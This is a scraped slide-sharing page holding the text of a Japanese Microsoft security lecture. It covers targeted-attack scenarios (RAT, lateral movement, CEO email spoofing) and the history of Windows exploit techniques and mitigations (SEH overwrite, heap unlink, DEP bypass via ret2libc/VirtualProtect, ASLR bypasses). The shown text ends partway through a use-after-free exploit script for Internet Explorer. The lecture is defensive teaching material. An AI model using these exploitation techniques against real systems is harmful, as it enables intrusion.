TataPixel: 畳の異方性を利用した切り替え可能なディスプレイの提案
TataPixel: 畳の異方性を利用した切り替え可能なディスプレイの提案TataPixel: 畳の異方性を利用した切り替え可能なディスプレイの提案
TataPixel: 畳の異方性を利用した切り替え可能なディスプレイの提案
 
論文紹介:Semantic segmentation using Vision Transformers: A survey
論文紹介:Semantic segmentation using Vision Transformers: A survey論文紹介:Semantic segmentation using Vision Transformers: A survey
論文紹介:Semantic segmentation using Vision Transformers: A survey
 
【早稲田AI研究会 講義資料】3DスキャンとTextTo3Dのツールを知ろう!(Vol.1)
【早稲田AI研究会 講義資料】3DスキャンとTextTo3Dのツールを知ろう!(Vol.1)【早稲田AI研究会 講義資料】3DスキャンとTextTo3Dのツールを知ろう!(Vol.1)
【早稲田AI研究会 講義資料】3DスキャンとTextTo3Dのツールを知ろう!(Vol.1)
 
自分史上一番早い2024振り返り〜コロナ後、仕事は通常ペースに戻ったか〜 by IoT fullstack engineer
自分史上一番早い2024振り返り〜コロナ後、仕事は通常ペースに戻ったか〜 by IoT fullstack engineer自分史上一番早い2024振り返り〜コロナ後、仕事は通常ペースに戻ったか〜 by IoT fullstack engineer
自分史上一番早い2024振り返り〜コロナ後、仕事は通常ペースに戻ったか〜 by IoT fullstack engineer
 
AWS の OpenShift サービス (ROSA) を使った OpenShift Virtualizationの始め方.pdf
AWS の OpenShift サービス (ROSA) を使った OpenShift Virtualizationの始め方.pdfAWS の OpenShift サービス (ROSA) を使った OpenShift Virtualizationの始め方.pdf
AWS の OpenShift サービス (ROSA) を使った OpenShift Virtualizationの始め方.pdf
 
デジタル・フォレンジックの最新動向(2024年4月27日情洛会総会特別講演スライド)
デジタル・フォレンジックの最新動向(2024年4月27日情洛会総会特別講演スライド)デジタル・フォレンジックの最新動向(2024年4月27日情洛会総会特別講演スライド)
デジタル・フォレンジックの最新動向(2024年4月27日情洛会総会特別講演スライド)
 

ARC-006_サイバー セキュリティ、IT Pro、開発、経営 それぞれの視点

  • 2.
  • 3.  Chief Security Officer ?Advisor Officer ? Chief Information Officer @security corp. Monitor SOA KPI Think Security from IT and daily life Technology CIA PDCASROI Chief Security Advisor  高橋 正和  日本マイクロソフト株式会社 チーフセキュリティアドバイザー
  • 4.
  • 6. *1 Risk and responsibility in a hyper connected world: Implications for enterprises January 2014 *2 Verizon 2013 Data Breach Investigation Report *3 Ponemon Institute Releases 2014 Cost of Data Breach *4 WSJ Symantec Develops New Attack on Cyberhacking 2014/5/4 *5 エフセキュアブログ アンチウィルスは死んだ? 2014/5/14 90% 企業の約7割はセキュリティ 事故を経験 9割は未知の脅威 が侵入済み*2 200日以上 攻撃者が検出されるまでに 被害者のネットワーク内に 潜伏している 中央値の日数は 200 日を超える 4.2億円 企業が被るデータ侵害の 平均コスト *3 45% 世間一般的に言う アンチウイルスは、 ここ5年以上も絶望的*5 わずか45%しか 検知できない *4
  • 7. 8 マイクロソフトのIT環境 100ヵ国+ 15万人 60万台+ AVの最新のリアルタイム検知適用率 98% 検出200万件 検出 7.0 件/年 感染 41件 感染 1/7300台/年 2016年7月-12月 (出典SIR20) セキュリティのパラドックス 対策が出来ていると、攻撃を把握できる 対策が出来ていないと、攻撃が把握できない
  • 8. 9
  • 11. DC 1 IT管理者 PC 2 • FileShare メール サーバー 秘秘 ファイル サーバー 秘秘 ファイア ウォール 攻撃者 Internet 標的PC > DIR > Cmd.exe xx.exe > Xxexec fileserver xx.cmd xx.exe xx.exe > DIR > Cmd.exe xx.exe > Xxexec fileserver xx.cmd Command prompt rat File Manager ファイルの転送 (双方向で転送可能) リモートからの コマンド実行 Main console rat Ratからの接続 xx.exe File共有を使って 標的PCから攻撃コ ツールをコピー ファイルサーバー上で xx.Execが実行される • 特権が必要な コマンドが実行できる • 特権が必要な コマンドが実行できる • 認証情報が搾取できる • 特権でログオン をしている RATコンソール
  • 12. DC 1 IT管理者 PC メール サーバー 秘秘 ファイル サーバー 秘秘 ファイア ウォール 攻撃者 Internet 標的PC > DIR > Cmd.exe xx.exe > Xxexec fileserver xx.cmd > Xxexec DC xx.cmd xx.exe xx.exe > DIR > Cmd.exe xx.exe > Xxexec fileserver xx.cmd > Xxexec DC xx.cmd Command prompt rat File Manager ファイルの転送 (双方向で転送可能) リモートからの コマンド実行 Main console rat Ratからの接続 ファイルサーバー 経由でDCでコマンド を実行 ファイルサーバー上で xx.Execが実行される 3 xx.exe この状態では、防ぐすべがない RATコンソール
  • 13. DC 1 IT管理者 PC メール サーバー 秘秘 ファイル サーバー 秘秘 ファイア ウォール 攻撃者 Internet 標的PC > DIR > Cmd.exe xx.exe > Xxexec fileserver xx.cmd > Xxexec DC xx.cmd > Mail –f hkai@contoso.co.jp xx.exe xx.exe > DIR > Cmd.exe xx.exe > Xxexec fileserver xx.cmd > Xxexec DC xx.cmd > Mail –f hkai@contoso.co.jp Command prompt rat File Manager ファイルの転送 (双方向で転送可能) リモートからの コマンド実行 Main console rat Ratからの接続 社長のアカウントを 偽装して、メールを送信 4 xx.exe この状態では、防ぐすべがない RATコンソール
  • 14. 15
  • 15. ① メールサーバ・GW ・メールサーバ・GWでマルウエアを 発見できず、メールを通過させている DC (認証サーバ) 1 2 • FileShare ファイル サーバー 秘秘 3 攻撃者 Internet 標的PC 秘秘 0 4 ② PC ・AVは検知・駆除せず ・RATのインストールに成功 ・外部からの操作が行われた ・パスワードによるデータ保護 ③ サーバー・ITインフラ ・PCなどの統制 5 ⑤ DC:ID管理・認証サーバ ・IDやPCなどの設定を管理する ドメイン管理者権限を奪取 ④ファイルの転送 ・ファイル転送機能等で外部へ 秘秘 ファイア ウォール ①攻撃の検知・防御 ②PCやサーバーの 権限・設定 ③適切な情報保護 ④システム的な統制と モニタ(監視・監査) ⑤教育・啓発・訓練 必要とされる視点 ネットワーク:PC等 に到達する攻撃を減少 させる ホスト:最新の攻撃を 検知しやすい環境 検出:ネットワークや ログから攻撃を検知・ 検出する マルウエアが動作しな い、他のPCやサーバ に侵入が困難なシステ ム・設定を実装する 特に、認証サーバーの 設定には配慮する ファイル(データ)を 盗まれても、情報が漏 れないような暗号を 使った保護を、多段階 で行う PCやサーバ、ネット ワーク接続を、一括し て管理できる仕組みを 構築する この仕組みに基づいた モニタを行い、監視や 監査の元データとする 利用者への教育は不可 欠、管理者に対する教 育も忘れずに行う 事故を想定した訓練を 定期的に実施すること も重要 事件の概要
  • 16.
  • 17. 敵を知る:攻撃指令 #2015-02-20 ハッカー宣言 • 目的のためには手段を選ばない • できるだけ楽な方法で攻撃する • 法律や規制は関係ない • 成功するまで続ける • 失敗を恐れない(失敗のコストが安い) • 時間をかけることを厭わない • CONTSO社が、ID-SEC社を買収する と噂されている。 • この買収が実現した場合、ID-SEC社 の株価は間違いなく上昇する • CONOTO社に侵入し、買収金額と、 発表の日程を盗み出せ • 市場を混乱させるために、その情報を 社長名義のメールでメディアにばらま け 攻撃にあたっての初期情報 • CONTSO社 • ITソフトの大手企業 • http://www.contoso.co.jp/ • ID-SEC社 • 認証技術に特化したITセキュリティベンダー • ID-SEC者が販売する次世代認証技術は、市場を変えるといわれている。 • ネットワーク • 外部から接続ができるのは、DMZのWebサーバーとメールだけである。 • 社内から社外に対する通信も、メールとWeb以外はすべてブロックされ ている • 標的リスト • 社長 林 櫂 hkai@contoso.co.jp • 人事部長 渋谷 あきこ sakiko@contoso.co.jp • 総務部長 大黒 俊英 otoshihide@contoso.co.jp • IT技術者 尾野 里佳子 orikako@contoso.co.jp • サポート窓口 support@contso.co.jp • 広報窓口 pr@contso.co.j • メディア • YAMN新聞 社会部 soc@yamn-shinbun.co.jp 18 標的 PC
  • 18. 19
  • 20. https://www.youtube.com/watch?v=pg26t5TxDHE SafeLink (ATP: Advanced Threat Protection) Safe Attachment (ATP: Advanced Threat Protection) 保護されビュー (Office 2016/2013/2010)
  • 21. Secured Boot and Measured Boot: Hardening Early Boot Components Against Malware https://technet.microsoft.com/en-us/windows/dn168167.aspx 厄介なマルウエア(rootkit) •Firmware rootkits. PCのハードウェア上に存在するrootkit •Bootkits. ブートローダーを書き換えて、OSよりも先に起動されるrootkit •Kernel rootkits. OSの一部を改版するrootkit. 常にOSの一部として起動. •Driver rootkits. PC上のハードウェアドライバーとして存在するrootkit Windows 8以降の対策 •Secure Boot. UEFIとTPMにより、信頼されたブートローダーである事を保証. •Trusted Boot. スタートアッププロセスのすべてのコンポーネントを ロードする前に、改版されていないことを検証. •Early Launch Anti-Malware (ELAM). ELAM はドライバーがロードされる前に起動され、ドライバーのチェックを行う. •Measured Boot. PCのファームウェアがブートプロセスを記録し、 信頼できるサーバーでPCのブートプロセスを検証する 鍵となるハードウェア •Unified Extensible Firmware Interface (UEFI) •Trusted Platform Module (TPM) 万一、マルウエアに感染した場合でも、OSから上だけの対処すればOK Windows 8以降
  • 24. 外部のサービス Home OOF Potentially Malware VSM: (Virtual Secure Mode) LAPS (Local Administrator Password Solution) アクセス方法の制御 (ネットワーク・ローカル) アカウントの認証 ボリュームの 保護 ファイルの保護 データの保護 権限のコントロール ID ①リスト型攻撃対策 Hello+Passport(FIDO) 社内ネットワーク ③Pass-the-Hash対策 VSM / LAPS 秘 秘 秘 1 3 2 ④認証と紐づいた情報保護 RMS/Enterprise Guard ③’ VSM 秘4 ②Malware対策 ATP/ WhiteList対策 White Black Potentially Malware ↑ White List Approach Black List Approach ↓ Local SecurityAuth Service Windows Apps VirtualTPM Hyper-Visor Code Integrity Virtual Secure Mode (VSM) AppLocker Device Guard ②’Rootkit対策 Secure boot • Secure Boot • Trusted Boot • Early Launch Anti- Malware • Measured Boot 管理者権限を奪取され ても、認証情報を保護 するための対策 Webサービスから 認証情報を盗まれても、 悪用を防ぐための対策
  • 26. システム的な統制:ADを中心としたIT管理基盤(MS IT) IDとアクセス管理 ホスト アプリケーション データネットワーク物理的 管理・監査 27
  • 27. INTERNET IPsec Corporate intranet SecureNet Important Servers Boundary Machine Infrastructure DNS Wins DHCP DC No Compliant Machine Mac/*NIX XBOX LAB Tablet phone Authorized PC Unauthorized PC 28 ACL リモート アクセス環境におけるセキュリティ強化へのマイクロソフトの取り組み http://technet.microsoft.com/ja-jp/library/bb735234.aspx DirectAccess の機能: http://www.microsoft.com/ja-jp/server-cloud/windows-server/directaccess-features.aspx Authorized PC IPsec Unauthorized PC • 端末間、端末 / サーバー間の接続を、 IPsec を使ったロジカル セグメンテー ションで構築 • Authorized な端末間でしか、接 続ができない • 無線 LAN の場合も、802.1x を 使い、証明書を利用し端末の接続 許可と排除を制御 • ユーザー認証の以前に、デバイス レベ ルでネットワーク接続の可否を制御 • 例外的な許可ルールが容易 • DirectAccess への展開により、外 部からの接続についても、イントラネッ トと同様に制御が可能 ドメインアカウントでログオンをしていない端末・ユーザーのイントラネットへのアクセスを防ぐ 利用者がドメインアカウントでログオンすることを促し イントラネットにアクセスする全てのPCに対して、 適切なセキュリティ対策が強制できるようにする
  • 28.
  • 29. 設計 セキュリティに関するアーキテク チャと、設計要件の規 定 弱い暗号の禁止 ソフトウェアのアタックサーフェスの ドキュメント化 脅威のモデル化 設計上のリスクを軽減す る 開発ツールと技術 静的なコード分析ツール 群 問題のあるAPIの禁 止 DiD プロテクションでの ビルド (/GS, HeapTerm, /NOEXECUTE, and ASLR) XSS 対策ライブラリの 利用 テストの為のツールと技術 Fuzzing アタックサーフェス分析 セキュリティコードレビュー 集中的なセキュリティテスト ペネトレーションテスト レスポスの計画の立案 Security Push 出荷基準への準拠 Final Security Review セキュリティチームによる独 立したレビュ SDL適応情報のド キュメント化 出荷と導入 承認 セキュリティレスポンス 計画の立案と実施 開発に対するフィード バックループ 原因の分析 教育とトレーニング セキュアな開発を 実施できるように 教育する 開始要件 セキュリティアドバイザの 配属 開発ツールと環境の用 意 セキュリティマイルストーンの設 定 要件定義 設計 実装 検査 出荷 対応・対処
  • 30.
  • 31. Windows Products and Security: never end story 1990 1991 1992 1993 1994 1995 1996 1997 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 • Concept • Melissa • I LOVE YOU• SolarSunrise • DDoS on DNS root • MyDoom •NetSky •Bagle Client-server/PC-LAN Internet Computer Crimes Protocol Weaknesses/Remote Buffer overflow • SPAM Mails • Spyware • Phishing proliferated Cyber Crimes • WiityWorm• Agobot • Sobig • Yahoo DDoS • Linux • MOSAIC • Net BSD •Free BSD •NetWare • Targeted Attack • Huge Data Leak •Mac OS-X • JP Gov. HP • AT&T Janes •IIJ • ADSL• テレホーダイ • Ping of Death • Yahoo •eBay • Google • Winny • Winny Incident • Brown orifice • Attacks for JP Soft Virus via Media • INN/phf • Back Orifice • statd,named,popd •DDoS tools Broad band Network Virus via E-Mail Worm communizationWorm in the wild Document / Local BO • Netscape • Virus Creation Laboratory • Michelangelo • Netcat • YouTube • Skype • Amazon • mySpace • mixi • Blog • First SPAM • Java • JavaScript • Real Player• PDF • Little Black Book • Windows 3.0 • Windows 95 • Windows 98 •NT3.1 • NT 4.0 •Win 2000 •Win XP SP2 •Win Vista •Win Server 2003 •Win XP •Win Server 2008 •Internet Explorer • Sasser ADHOC /Product/Marketing TwC (Trustworthy Computing) STF W2K Pen- testPREfix XPPREfast .NET MSRC (secure@microsoft.com) 2003 SWI(Secure Windows Initiative) • Slammer • Blaster SDL Security Development Lifecycle OF2003 SQL2K3 EXC2K-3 Etc.. Single User OS Multi User OS MSRC • secure@Microsoft • Windows Update • メディア対応の一本化 STF: 有益な知見を得るが実施されず SD3+C WS2K: 多数のセキュリティ機能を実装、 しかしバグの多さが問題 SWI: 製品部門の教育、設計とコードレ ビュー、問題の修正 Ship Stopper XP: 魚を釣る代りに釣り方を教える Security Day/Bug bash .NET: First Security Push W2K3: 8500人の開発を停止 良好な状態での出荷 1年以上の出荷遅れ 毎週水曜にセキュリティ更新 (2002年5月) 毎月第二火曜にセキュリティ更新 (2003年11月) SDL: Ad hocからエンジニアリングへ 全ての製品がSDL必須に 年に二回、SDLを更新 • CodeRed • Nimda SecurityPush +FinalSecurityReview WIndows Update (1998年7月)
  • 32. • 主な出典:Matt Miller • A Brief History of Exploitation Techniques & Mitigations on Windows • http://www.atmarkit.co.jp/ait/series/1568/
  • 33. はじまりは 1988年 インターネットワーム(Morris worm) 事件の概要 • 単に感染を繰り返すものであったが,当時インターネットに接 続されていたコンピュータの10%(6000台)に直接的な被害 • インターネットからコンピュータを切り離したサイトも多かっ たため、結果として,インターネットを大きな混乱に陥れた • 学生は放校処分となり、1990年には裁判で有罪とされた • 判決は $10,000 の罰金、3年間の保護観察および 400時間の公共奉仕活動の義務だった • 侵入先から情報を収集し、次の侵入先を決めるメイン部 • メイン部に先立って送り込まれるブートストラップ部 • Unix セキュリティホール • rコマンド • sendmail デバッグオプション • finger デーモンの入力バッファ • パスワードの推測 1988年 インターネットワーム事件 http://www.soi.wide.ad.jp/class/20020008/slides/08/21.html UNIX MAGAZINE 1989.10 UNIX Communication Notes 16 Worm,Worm,Worm 対策・対処 • 1988年 CERT/CCの設立(Computer Emergency Response Team / Coronation Center) • インシデントに対するSingle Point of Contact • 1989年10月に出現したWankワームは,組織,国にまたがっ たコミュニケーションの欠落が適切な対応の推進を妨げたと いう教訓を残し,緊急対応チームの組織間ならびに国際間連 携を目的としたFIRST(Forum of Incident Response and Security Teams)の組織化につながった。 • 国内では,1996年にJPCERT/CC(Japan Computer Emergency Response Team/Coordination Center) • 非常に面白く、現在にも通じる攻撃手法を多数悪用している • 今回は、fingerデーモンに使われた Buffer Overflowについて 着目する
  • 35. Stack Overflow (Buffer Overflow) 脆弱性に対する攻撃 コード(Shell code) 攻撃実行部分 ドキュメントファイル .doc, .pdf など ① 脆弱性を使って、ドキュメント中に埋め込んだ、攻撃プログ ラムのアドレスにジャンプする ② 攻撃プログラムが、ドキュメントを取り扱うプログラムの一 部として実行される Buffer Overflow ドキュメントの読み込み プログラムの流れ Data Segment 1 2 Code Segment 引数 EIP EBP ローカル変数 引数 EIP EBP ローカル変数 Lower address Higher address 現在実行中の関数が使 用しているスタック 現在実行中の関数を呼 び出した関数が使用し ているスタック Buffer Overflow EIP - Instruction Pointer 次に実行されるCPU命令のアドレ スを指す。CALL命令実行時に、スタック上に保存される。 JUMP系の命令はEIPレジスタを直接書き換える。 EBP - Base Pointer スタックフレーム上で、関数の引数や ローカル変数を参照する時に使う基準点となるアドレスを格 納する32ビットレジスタ。ESPレジスタと違い、EBPレジス タは手動で変更する。「フレームポインタ(Frame Pointer)」 とも呼ばれる。
  • 36. 基本的なコンピューターの動作 (ノイマン型・Stored Programing Method) アドレス 機械語 ニーモニック/逆アセンブル EIP レジスタ ESP スタック
  • 37. スタック上の関数の引数とローカル変数の例 012fe94 00409068 EIP: Return address 012fe98 00000003 Handle = 3 012fe9c 0012fea8 Char *buf 012fea0 00000400 Len = 1024 012fea4 00000003 3 012fea8 43424140 Buf[16] 012feac 47464544 012feb0 4B4A4948 012feb4 4F4E4D4C 012feb8 00000010 16 012febc 00000400 1024 012fec0 0012fee4 EBP 012fec4 0040101a EIP: Return address 012fec4
  • 38. VS2002:GS Cookie 引数 EIP EBP ローカル変数 Lower address Higher address GS Cookie Buffer Overflow Visual Studio 2002で、 関数から戻る際に、GS Cookieをチェックし、 変更されていれば、 異常終了するようにした GS Cookieの回避策 • 関数から戻るときにチェックするので、 関数から戻る前に攻撃を完了する。 • GS Cookieを上書きすることができた。 void vulnerable(char *in, char *out) { char buf[256]; strcpy(buf, in); // overflow! strcpy(out, buf); // out is corrupt return; //canary checked } この例では、char *outとして渡されるアドレスに、Buffer Overflow により、任意のデータを書きこむことができる。 しかし、この関数(vulnerable)のGS Cookieは上書きされていないの で、Overflowを検出することが出来ない。
  • 39. /GSの改良 引数 EIP EBP ローカル変数 Lower address Higher address GS Cookie • 引数のコピーをローカル 変数としてコピーする • 配列をGS Cookieの直前 に配置する SEH Overwrite void vulnerable(char *ptr){ char buf[128]; try {strcpy(buf, ptr); … exception … } except(…) { } } 配列 引数の コピー SEHOP • 例外処理を書き換えることにより、任意のコードを実行する Next Handler app!_except_handler4 k32!_except_handler4 ntdll!_except_handler4 0xffffffff Next Handler Next Handler Shell CodeNext Handler Buffer Overflow
  • 40. SEH Overflow 引数 EIP EBP ローカル変数 Lower address Higher address GS Cookie • 関数内で例外処理をしている場合、 例外処理アドレスは、ローカル変 数の直後におかれる。 • このため、Buffer Overflowによ り、例外処理ハンドラー(SEH: Structured Exception Handler ) を書き換えることができる。 • GS Cookieがチェックされる前に 例外を発生させることができれば、 Overflowによりセットしたアドレ スに制御を移すことができる。 void vulnerable(char *ptr){ char buf[128]; try { strcpy(buf, ptr); … exception … } except(…) { } } Buffer Overflow 配列 引数の コピー Next Handler 例外処理 Exception Registration Record Normal SEH Chain Next Handler app!_except_handler4 k32!_except_handler4 ntdll!_except_handler4 0xffffffff Next Handler Next Handler Next Handler 0x7c1408ac ox414106eb Corrupt SEH Chain pop eax pop eax ret この場合、eaxにセットされているアドレスに、戻る (ジャンプする)ことになる
  • 41. Safe SEH app!eh2 app!eh1 Visual Studio 2003で/SafeSEHオプションを追加 コンパイル時に、安全な(プログラムが明示的に設 定した)例外処理ハンドラーのテーブルを作成する。 例外処理を実行する際に、例外処理(Handler)のア ドレスが、テーブル中にある事をチェックし、存在 しない場合はプログラムを終了する SEH Overwrite Part II プログラムの実行イメージ Next Handler app.exe kernel32.dll ntdll.dll app!eh2 app!_except_handler4 Safe SEHtable app!_except_handler4 app!_main+0x1c テーブル中に存在するので、 実行される テーブル中に存在しないので、 実行されない …… Thirdparty.dll ntwrap.dll SafeSEHは、/SafeSEHオプションでコンパイルされたモジュー ルだけで有効で、/SafeSEHを使っていないモジュールが、実行 イメージに展開される場合、そのモジュール中にあるアドレスを、 例外処理として登録することが出来てしまう。 /SAFESEHで コンパイル /SAFESEHなしで コンパイル /SAFESEHなしで コンパイル
  • 42. Dynamic SafeSEH GSとSaefeSEHのまとめ 正常なSHEチェーン Next Handler app!_except_handler4 k32!_except_handler4 sehprot!_validation_eh Next Handler Next Handler 上書きされたSHEチェーン Next Handler app!_main+0x1c 0x41414141 ???? Dynamic SafeSEHでは、例外処理テーブルの最後に、評 価用の値をセットする。 Nextポインタが上書きされると、評価用のアドレスへのリ ンクが切れるため、改ざんを検知することができる。 • GSとSafeSEHは、スタックベースのオー バーフローに対する有効な緩和策である。 • ただし、この緩和策を有効にするためには、 アプリケーションを再コンパイルする必要 がある。 • 古いプログラムや、3rd パーティのアプリ ケーションを守るためには、追加的な緩和 策が必要である。
  • 44. blink Buffer flink(1010) blink(1030) flink(1020) blink(1000) flink(1000) blink(1020) Buffer Buffer flink(1030) blink(1010) Buffer blink Buffer flink(1020) blink(1030) flink(1000) blink(1020) Buffer flink(1030) blink(1000) Buffer Free 48 1010 1030 flink blink 1020 1000 1030 1010 1000 1020 1000 1010 1020 1030 Free  1010 1030 flink blink 1020 1000 1030 1010 1000 1020 1000 1010 1020 1030 実際には連続したアドレス 1020 1000 Heapの仕組み Heap Freeの概要
  • 45. Heap Overflow 任意のアドレスに任意の4バイトを書きこむ 49 1010 1030 flink blink 1020 1000 1030 1010 1000 1020 1000 1010 1020 1030 Free  1010 1030 flink blink 1020 1000 1030 1010 1000 1020 1010 1030 flink blink 1020 1000 1030 1010 1000 1020 1020 1030 flink blink 2000 4141 1030 1000 1000 1020 1000 1010 1020 1030 1010 1030 flink blink 1030 1010 1000 1020 2000 2000 1000 1010 1020 1030 Free  1000 1010 1020 1030 Heapの状態と、正常なFree 関数ポインターなどを書き換える Heap Overflowによる、任意のアドレスへの書き込み 1020 1000 1020 10002000 4141 4141 Heap Overflow 2000
  • 46. Heap対策 flink 1 blink 1 flink 2 blink 2 flink 3 blink 3 flink 4 blink 4 Cookie(chunk) Cookie(chunk) Cookie(chunk) Cookie(chunk) • 双方向リンクのチェックを行 うように修正 Windows 7では、カーネル プールについても適用 • Flink/Blinkの前段にChunk を設置し、Chunkが書き換 えられている場合、 Overflowが起きていると判 断する Windows XP SP2/WS2003 Preventing the exploitation of user mode heap corruption vulnerabilities http://blogs.technet.com/b/srd/archive/2009/08/04/preventing-the-exploitation-of-user-mode-heap-corruption-vulnerabilities.aspx Windows Vista, WS 2008 Windows 7 • Lookaside, array listを廃止し、 LFH(Low Fragmentation Heap)を利用 • Heapエントリーを乱数とのXOR • ASLRによりベースアドレスをランダム 化(5bit) • Heap Structure中の関数ポインタを乱 数とXOR • Termination on heap corruptionがオ ンの際には、Heap構造に異常を見つけ ると、プロセスを終了する ~flink1 ~ blink1 ~ flink2 ~ blink2 ~ flink3 ~ blink3 ~ flink4 ~ blink4 Cookie(chunk) Cookie(chunk) Cookie(chunk) Cookie(chunk) Windows Vista以降で採用された Heap対策を破る攻撃は確認されていない E->flink->blink == E->blink->flink == E ASLR
  • 48. ハードウェア DEP 引数 EIP EBP ローカル変数 Lower address Higher address Padding Address of Jmp esp Shellcode BufferOverflow 引数 EIP EBP ローカル変数 Lower address Higher address ret2libc: return to libc Stack Segment Address of system fake Return address address of “cmd” Arg2 Arg1 Padding BufferOverflow API API • 攻撃コードは、一般に 書き込み可能なメモ リー領域にShellcodeを 書きこむ • このため、スタック領 域などを、non- executableにセットす ることで、Shellcodeの 実行を止めることがで きる。 • Visual Studio 2005で、 フラグをセットしてコ ンパイルする必要があ る。 • NX Stack/heapは、この領域に書きこまれたコードの実行 に対してだけ有効 • ライブラリーコードは、実行可能領域にあるため、DEPで は防ぐことが出来ない。 • ret2libcだけでは、それほど有効な攻撃は出来ないのだが、 ret2libcを使って、DEPを無効にするAPIを呼び出して、そ の後にスタック等に展開されたShellcodeを実行する。 DEP
  • 49. Return to Libc / Return Oriented Program Return to Libc • ASLRにより、ロードアドレス、ヒープアドレスをランダマイズ • スタック・ヒープ領域に展開したShell Codeではなく、ライブ ラリのアドレスを、リターンアドレスにセットする。 • スタックに任意のパラメータをセットすることで、APIを任意の パラメーターで呼び出すことができる。 • 正規のAPIを利用するので、DEPで防ぐことが出来ない • ASLRが実装されているシステムでも、ASLRを利用しないモ ジュール(dll等)がある場合、これを利用することで、攻撃を 成功させることができる ROP: Return Oriented Program • コードセグメント中に、自分が実行したいコードと(偶然)同じ インストラクションを持つ部分を探す • リターンアドレスに、そのコードアドレスをセットする • 正規のAPIを利用するので、DEPで防ぐことが出来ない • ASLRが実装されているシステムでも、ASLRを利用しないモ ジュール(dll等)がある場合、これを利用することで、攻撃を 成功させることができる • パラメーターのセットも必要ないため、限定的な条件でも動作し やすい 出典:「Dino Dai Zobi, "Mac OS X return oriented exploitation“ http://trailofbits.files.wordpress.com/2010/07/mac-os-x_roe.pdf
  • 50. ret2libc: return to libc の攻撃例 Lower address Higher address size of Shellcode Address of Shellcode Address of jmp esp Address of virtual Protect RWX(read/write/exe) Writeable address Shellcode 1 Return from Valnerable function 2 Entry to VirtualProtect 3 Return from VirtualProtect この例では、VitrualProtectを呼び出し、Shellcodeをアサインした 領域を、実行可能にしたあと、Shellcodeにジャンプ(Return)する 1. 脆弱な関数の戻り番地を、Virtualprotectにセットする 2. Entry to VitrualProtectは、Shellcodeを実行可能にするための 引数をセットしている。 3. 戻り番地として、shellcodeのアドレス(Address of jmp esp) をしているので、Shellcodeに制御が移動する。 VirtualProtect 呼び出し側のプロセスの仮想アドレス空間内のコミット済みページ領域に対 するアクセス保護の状態を変更します。 任意のプロセスのアクセス保護を変更するには、VirtualProtectEx 関数を使 います。 BOOL VirtualProtect( LPVOID lpAddress, // コミット済みページ領域のアドレス DWORD dwSize, // 領域のサイズ DWORD flNewProtect, // 希望のアクセス保護 PDWORD lpflOldProtect // 従来のアクセス保護を取得する変数のアドレス ); Return to VirtualProtectを実行するには、NULLバイトが利用できる 必要がある(文字列のオーバーフローでは、通常は利用できない) Windows には、disable NXのAPIがあり、ntdllがこれを呼び出して いるの、このコードを利用することができる。 NtSetInformationProcess[0x22]
  • 51. Permanent flag DEP(NX)のまとめ • Boot flagによって、アプリケーション が常にNXが有効な状態である事を強制 できる • プロセスから、以下のAPIを呼び出すこ とにより、NXフラグの変更を防ぐこと ができる。 • NtSetInformationProcess[22] with flag 0x8 • しかし、VitualProtectへの緩和策には なっていない • StackやHeap等のメモリーセグメントを、 ハードウェアにより実行不可にすること ができる。 • Ret2libcは、Shellcodeを使うことなく、 マリシャスなコードを実行することがで きる。 • この手法(ret2libc)は、NXを無効にす るために、使うことができる。 • VirtualProtect • NtSetInformationProcess
  • 52. Address Space Layout Randomization(ASLR) • 攻撃手法は、実行イメージのアドレスに関 する情報の上に成り立っている • リターンアドレスに使うためのアドレス • SHEハンドラーに使うためのアドレス • ライブラリールーチンを呼び出す (ret2libc)ためのアドレス • アドレススペースが、予測できないとした らどうだろうか。 app.exe user32.dll ssleay32.dll ntdll.dll app.exe user32.dll ssleay32.dll ntdll.dll app.exe user32.dll ssleay32.dll ntdll.dll • Address Space Layout Randomization(ASLR) • /dynamicbaseでコンパイルをする必要がある • メモリーロケーションをランダム化する • アドレスは、事前に予測することができなくなる Boot1 Boot2 Boot3
  • 53. Partial overwrite Lower address Higher address • 上位の2バイトだけがラ ンダマイズされている • 下位の2バイトは、上位 アドレスが違っていても 共通しているため、これ を利用することができる • 0x1446047c 0x14461846 引数 EIP EBP ローカル変数 GS Cookie High Low Buffer Overflow app.exe user32.dll ssleay32.dll ntdll.dll app.exe user32.dll ssleay32.dll ntdll.dll app.exe user32.dll ssleay32.dll ntdll.dll Boot1 Boot2 Boot3 • 全てのバイナリーモジュールが、ASLRを有効にしているとは 限らない • 実行ファイルが、ASLRを無効にしていることも少なく ない • ASLRは、すべての領域がランダム化されたときに、効果を発 揮する ASLRを適用していない モジュールを悪用する EBPローカル変数 EIP Low High Buffer Overflow
  • 54. Brute Force • VistaのASLRでは、大半のDLLは、ブート時のみに ランダム化される • アドレスに対するBrute Forceが可能かもしれない • Forkを使うデーモン(サービス)はない • つまり、プロセスの再生成が行われない • Vistaのサービスのリスタートポリシーが、これを制限して いる • 多くの場合は、それほど効果的な手法ではない Information disclosure • アプリケーションのバグが、アドレススペース の情報を、攻撃者に知らせる可能性がある。 • これに基づいて、再現性の高いリターンアドレ スを作成することができる。 • イメージファイルのバージョンがわかるだけで、これ が可能となる ASLRまとめ • アドレススペースが予測不能となる • 攻撃コードは、オペレーションコードや他の値 を知ることができなくなる • しかし、まだ弱点がある • Partial overwrite • Brute Force • Information disclosure
  • 55. Use After Freeと Heap Spray ゼロデー攻撃をめぐる攻防
  • 56. Use After Freeによる任意データの書き込み<html> <script> 1. // Create ~ 200 comments using the randomly selected three character string AAA, will change data later in an attempt to overwrite var Array1 = new Array(); for (i = 0; i < 200; i++) { Array1[i] = document.createElement("COMMENT"); Array1[i].data = "AAA"; } var Element1 = null; 2. // Function is called by the onload event of the IMG tag below // Creates and deletes object, calls the function to overwrite memory function FRemove(Value1) { Element1 = document.createEventObject(Value1); // Create the object of the IMG tag 3. document.getElementById("SpanID").innerHTML = ""; // Set parent object to null to trigger heap free() 4. window.setInterval(FOverwrite, 50); // Call the overwrite function every 50 ms } 5. // Function attempts to overwrite heap memory of deleted object and then access object to trigger crash function FOverwrite() { buffer = "¥uAAAA¥uAAAA¥uAAAA¥uAAAA~ ¥uAAAA¥uAAAA¥uAAAA¥uAAAA¥uAAAA¥uAAAA¥uAAAA~ ¥uAAAA¥uAAAA¥uAAAA¥uAAAA¥uAAAA¥uAAAA¥uAAAA~ ¥uAAAA¥uAAAA¥uAAAA¥uAAAA¥uAAAA¥uAAAA¥uAAAA~ ¥uAAAA¥uAAAA¥uAAAA¥uAAAA¥uAAAA¥uAAAA¥uAAAA~ ¥uAAAA¥uAAAA¥uAAAA¥uAAAA¥uAAAA¥uAAAA¥uAAAA~ ¥uAAAA¥uAAAA¥uAAAA"; for 